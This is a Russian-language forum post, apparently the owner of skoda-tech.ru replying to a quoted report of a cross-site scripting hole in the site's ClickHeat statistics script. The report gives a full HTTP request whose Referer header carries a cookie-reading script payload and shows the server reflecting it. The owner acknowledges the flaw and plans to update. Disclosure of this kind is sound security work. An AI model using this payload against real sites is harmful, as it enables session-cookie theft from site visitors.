Самопал.

#10

11.10.2009, 23:54

RedBull@12

Участник форума

Регистрация: 06.11.2006

Сообщений: 129

С нами: 10269701

Репутация: 58

Цитата:

Сообщение от (Dm)

Не такой уж и самопал)
>> http://skoda-tech.ru/clicks/ - clickheat

>> XSS
Запрос:

Код:

GET http://skoda-tech.ru/clicks/click.php?s=skoda-tech.ru&g=/s_%D0%A1%D1%82%D0%B5%D0%BA%D0%BB%D0%BE&x=76&y=481&w=1265&b=firefox&c=1&random=Sun%20Oct%2011%202009%2005:06:45%20GMT+0400%20(MSD) HTTP/1.1
Host: skoda-tech.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: language=en; PHPSESSID=som5sjb7epoqjohki3jpfiakc2
Referer: http://<HTML><BODY ONLOAD=alert(document.cookie)>/

Ответ:

Код:

Forbidden domain (<html><BODY ONLOAD=alert(document.cookie)>), change or remove security settings in the config panel to allow this one

подозревал что что-то подобное в этой статистике будет...ридется отключить...один хер толку мало...
движок весь самопальный...кроме этого сервиса статистики...но если кто-то будет его ставить лучше не надо...толку мало...сегодня проапдейчу...и велком...для дальнейших изувечий=)